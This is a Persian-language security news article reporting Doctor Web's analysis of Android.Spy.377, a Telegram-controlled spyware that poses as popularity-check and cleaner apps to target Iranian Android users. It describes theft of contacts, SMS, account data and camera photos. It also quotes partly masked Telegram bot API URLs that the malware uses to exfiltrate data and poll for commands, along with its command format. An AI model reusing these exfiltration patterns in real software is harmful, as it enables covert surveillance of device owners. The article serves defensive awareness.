نماد سایت اتاق خبر شبکه گستر

کاربران ایرانی هدف جاسوس‌افزار اندرویدی

به گزارش شرکت مهندسی شبکه گستر، محققان امنیتی Doctor Web از انتشار بدافزاری از نوع اسب تروا (Trojan) خبر داده‌اند که کاربران ایرانی را بر روی دستگاه‌های با سیستم عامل Android هدف قرار می‌دهد. به گفته این محققان اسب تروای مذکور که به Andriod.Spy.377 موسوم شده از طریق پودمان‌های تبادل اطلاعات Telegram توسط نویسنده یا نویسندگان خود مدیریت شده و اطلاعات شخصی و خصوصی افراد را سرقت می‌کند.

Andriod.Spy.377، در حقیقت، یک ابزار دسترسی از راه دور است که تحت پوشش برنامه‌های دیگری همچون “اینستا پلاس”، “پروفایل چکر” و “Cleaner Pro” و با بهره‌گیری از تکنیک‌های مهندسی اجتماعی گسترش می‌یابد.

اسب تروای Android.Spy.377 یک جاسوس‌افزار سنتی است که قابلیت اجرای دستورات مخرب را داراست. تفاوت اصلی آن با سایر اسب‌های تروای تحت سیستم عامل Android قابلیت مدیریت شدن آن از طریق پودمان‌های تبادل اطلاعات Telegram است.

به‌محض اجرا شدن، Andriod.Spy به کاربر صاحب دستگاه پیشنهاد می‌دهد تا از میزان محبوبیت خود در میان سایر کاربران Telegram مطلع شود. در صورت موافقت، از کاربر خواسته می‌شود که شناسه شخصی Telegram خود را وارد کند.

پس از وارد شدن اطلاعات درخواستی در پنجره مربوطه، Andriod.Spy یک عدد دلخواه را تولید کرده و به کاربر نمایش می‌دهد. این تابع صرفاً برای جلوگیری از مشکوک به نظر رسیدن اسب تروا است. همچنین برخی اوقات پس از اجرا، Andriod.Spy.377، میان‌بر (Shortcut) خود را از صفحه اصلی دستگاه حذف کرده و پنجره خود را جهت پنهان ماندن متوقف می‌کند.

پس از حذف میان‌بر، Android.Spy.377 فهرست تماس‌ها، پیامک‌های ارسالی و دریافتی و اطلاعات حساب کاربری Google کاربر را کپی کرده و آنها را در یک فایل متنی در حافظه جانبی و مسیر /Android/data ذخیره می‌کند.

فایل‌های ایجاد شده توسط اسب تروا عبارتند از: (IMEI به شناسه International Mobile Equipment Identity دستگاه آلوده شده اشاره دارد)

علاوه بر آن، Android.Spy.377 از طریق دوربین جلویی گوشی اقدام به عکسبرداری کرده و ضمن ارسال عکس گرفته شده و اطلاعات سرقت شده به سرور فرماندهی (Command & Control) خود، پیامی را که به آلوده شدن موفقیت‌آمیز دستگاه اشاره دارد به ربات Telegram زیر ارسال می‌کند:

http://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage

نمونه‌ای از متن پیام ارسالی در زیر قابل مشاهده است:

chat_id15255796&text=نصب+جدید
[user’s mobile number]
IMEI+:+:8680*******2554
Android+ID+:+fad6c1*******1dc
Model+:+[device name]
***.***.137.202
IMEI2554*******8680+:دستگاه

تصویر زیر نیز نمونه‌ای از مجموعه فایل‌های ارسال شده به نویسنده یا نویسندگان Andriod.Spy.377 را نشان می‌دهد.

به گزارش شرکت مهندسی شبکه گستر، پس از سرقت اطلاعات خصوصی، Andriod.Spy.377 مجدداً از طریق نشانی زیر به ربات Telegram خود متصل شده و منتظر دریافت فرامین کنترلی می‌ماند.

https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/getupdates?offset=-1

این اسب تروا قادر به دریافت و اجرای فرامین زیر است:

قالب فرمان ارسال شده به اسب تروا، به صورت زیر است:

command@imei@parameters

هنگامی که یکی از دستورات فوق اجرا شوند، Andriod.Spy.377 اطلاعات بدست آمده را به ربات Telegram خود ارسال می‌کند. (در عبارت زیر در قسمت [phoneNumber] شماره تلفن دریافت شده از دستور قرار می‌گیرد)

https://api.telegram.org/bot3399*****:AAHeJoVC3i8zzwXhtCQMBoev***********/sendmessage?chat_id=275899582&text=call with”+ message[phoneNumber]

علاوه بر جمع‌آوری اطلاعات خصوصی، هنگامی که اسب تروا فرمانی را از ربات Telegram دریافت کند قادر است به صورت مستقل تمامی پیامک‌های ارسالی و دریافتی و مختصات جغرافیایی دستگاه را رصد کرده به محض ارسال و یا دریافت پیامک یا تغییر مختصات جغرافیایی دستگاه، موضوع را به ربات Telegram خود اطلاع دهد.

برای ایمن ماندن از گزند این نوع بدافزارها، رعایت موارد زیر توصیه می‌شود:

خروج از نسخه موبایل